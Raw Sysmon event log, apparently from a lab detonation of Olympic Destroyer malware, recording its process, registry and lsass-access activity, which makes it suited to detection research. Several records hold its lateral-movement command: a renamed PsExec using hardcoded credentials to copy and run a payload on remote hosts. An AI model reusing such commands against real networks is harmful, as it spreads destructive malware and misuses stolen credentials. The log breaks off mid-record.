10:56:53.390{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-12F5-6216-B705-000000003802}6708C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291669Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:53.390{C8EA50B7-12E6-6216-4B05-000000003802}67926872C:\Temp\olympic_destroyer.exe{C8EA50B7-12F5-6216-B705-000000003802}6708C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000291668Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:53.393{C8EA50B7-12F5-6216-B705-000000003802}6708C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\255.255.255.255 -u "VULT\r.vult" -p "LottaVirus2019" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000291667Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:53.390{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F5-6216-B705-000000003802}6708C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000291666Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:53.374{C8EA50B7-12F5-6216-B505-000000003802}6544C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000291665Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:53.374{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12F5-6216-B505-000000003802}6544C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291664Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:53.374{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12F5-6216-B505-000000003802}6544C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000291663Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:56:53.359{C8EA50B7-12F5-6216-B505-000000003802}6544C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 23542300x8000000000000000291662Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:53.343{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=891D16686E6A6CDA2AD7CDA393964E33,SHA256=9C92DC4DA62204778464DDF3118B4356A7F5D22CE49F5370D2CE9A02C090A3BA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291661Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:53.321{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12F5-6216-B605-000000003802}6664C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291660Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:53.321{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12F5-6216-B605-000000003802}6664C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291659Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:53.321{C8EA50B7-12F5-6216-B605-000000003802}66646748C:\Windows\system32\conhost.exe{C8EA50B7-12F5-6216-B505-000000003802}6544C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291658Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:53.290{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-12F5-6216-B605-000000003802}6664C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291657Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:53.274{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F5-6216-B605-000000003802}6664C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291656Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:53.160{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-12F5-6216-B505-000000003802}6544C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291655Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:53.160{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291654Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:53.160{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291653Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:53.160{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291652Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:53.160{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291651Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:53.160{C8EA50B7-12E6-6216-4B05-000000003802}67926872C:\Temp\olympic_destroyer.exe{C8EA50B7-12F5-6216-B505-000000003802}6544C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000291650Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:53.162{C8EA50B7-12F5-6216-B505-000000003802}6544C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\255.255.255.255 -u "VULT\r.vult" -p "LottaVirus2019" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000291649Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:53.160{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F5-6216-B505-000000003802}6544C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000217747Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:53.089{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=743C9FBED917FB1CC49197FF3E4B39B9,SHA256=C570CBDCF602C957332A3E9CE8B09311D05BDAAC3FB9383A9E710F4F1AC4CEF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217748Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:54.104{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66133E028C8FEFBF463C48DEE80F6C85,SHA256=15411A7E89AFB339F47DACAEFFCA107BDD7861CBD53DE97DFCD1B664D1F7390E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291729Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:54.897{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291728Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:54.897{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291727Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:54.897{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291726Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:54.897{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291725Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:54.865{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-12F6-6216-BD05-000000003802}6780C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291724Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:54.865{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F6-6216-BD05-000000003802}6780C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291723Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:54.865{C8EA50B7-12E6-6216-4B05-000000003802}67926872C:\Temp\olympic_destroyer.exe{C8EA50B7-12F6-6216-BD05-000000003802}6780C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000291722Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:54.867{C8EA50B7-12F6-6216-BD05-000000003802}6780C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\255.255.255.255 -u "VULT.LOCAL\r.vult" -p "LottaVirus2019" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 534500x8000000000000000291721Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:54.850{C8EA50B7-12F6-6216-BB05-000000003802}6796C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000291720Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 